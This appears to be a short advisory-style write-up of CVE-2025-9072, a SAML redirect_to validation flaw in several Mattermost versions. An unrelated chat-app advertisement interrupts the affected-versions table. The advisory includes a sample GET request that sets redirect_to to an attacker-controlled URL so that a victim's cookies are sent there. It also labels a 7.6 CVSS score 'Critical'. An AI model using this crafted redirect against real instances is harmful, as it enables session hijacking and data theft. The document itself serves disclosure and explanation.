Overview
This report covers the discovery and analysis of a serious vulnerability, CVE-2025-9072, affecting Mattermost versions 10.10.x <= 10.10.1, 10.5.x <= 10.5.9, 10.9.x <= 10.9.4. This flaw exposes systems to potential compromise and data leakage, highlighting the need for immediate patching. Vulnerability Summary
CVE ID: CVE-2025-9072
Severity: Critical (7.6 CVSS Score)
Attack Vector: Network
Privileges Required: None
User Interaction: Required
Impact: System compromise and data leakage through cookie theft
Affected Products
Product | Affected Versions
A new way to communicate
Ameeba Chat is built on encrypted identity, not personal profiles.
Message, call, share files, and coordinate with identities kept separate.
- • Encrypted identity
- • Ameeba Chat authenticates access
- • Aliases and categories
- • End-to-end encrypted chat, calls, and files
- • Secure notes for sensitive information
Private communication, rethought.
Mattermost | 10.10.x <= 10.10.1 Mattermost | 10.5.x <= 10.5.9 Mattermost | 10.9.x <= 10.9.4 How the Exploit Works
The vulnerability lies in the improper validation of the redirect_to parameter. An attacker can exploit this flaw by crafting a malicious link. Once a user authenticates with their SAML provider, the user’s cookies could be posted to an attacker-controlled URL, enabling possible system compromise and data leakage.
Conceptual Example Code
The following is a
conceptual
example of how the vulnerability might be exploited. This could be a sample HTTP request, where the redirect_to parameter is manipulated:
GET /login/sso/saml?redirect_to=https://attacker-controlled-url.com HTTP/1.1
Host: vulnerable-mattermost-instance.comIn this example, the user’s cookies would be posted to the attacker-controlled URL, potentially compromising the user’s session and any sensitive information contained within those cookies.